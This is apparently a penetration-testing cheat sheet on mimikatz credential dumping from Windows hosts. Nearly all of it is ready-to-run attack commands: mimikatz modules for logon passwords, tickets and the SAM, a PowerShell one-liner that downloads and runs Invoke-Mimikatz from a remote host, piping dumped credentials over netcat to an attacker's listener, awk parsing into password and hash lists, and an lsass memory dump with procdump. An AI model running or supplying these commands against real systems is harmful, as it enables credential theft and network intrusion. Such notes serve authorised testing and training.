mimikatz
Basic Commands
# Lists all available provider credentials.
# This usually shows recently logged on user and computer credentials
CMD> mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets
# List all SAM info
mimikatz # token::elevate
mimikatz # lsadump::sam
mimikatz # lsadump::cache
# Powrshell based mimikatz
CMD> powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.35/post/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
PS> IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.35/post/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds
Output to Kali
# Kali
nc -nlvp 1234 > mimikatz_out.txt
# Target Windows
.\mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc64.exe -vv 10.10.14.35 1234
# Print username
cat mimikatz_out.txt|tr -d '\011\015' |awk '/Username/ { user=$0; getline; getline; print user " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($8)>2) print $4 ":" $8}'|sort -u
# Print hash
cat mimikatz_out.txt |tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* Password\|Microsoft_OC1"|awk '{if (length($12)>2) print $8 "/" $4 "%aad3b435b51404eeaad3b435b51404ee:" $12}'|sort -u
Procdump to mimikatz
# https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
CMD> procdump -accepteula -ma lsass.exe lsass.dmp
CMD > mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords
Last updated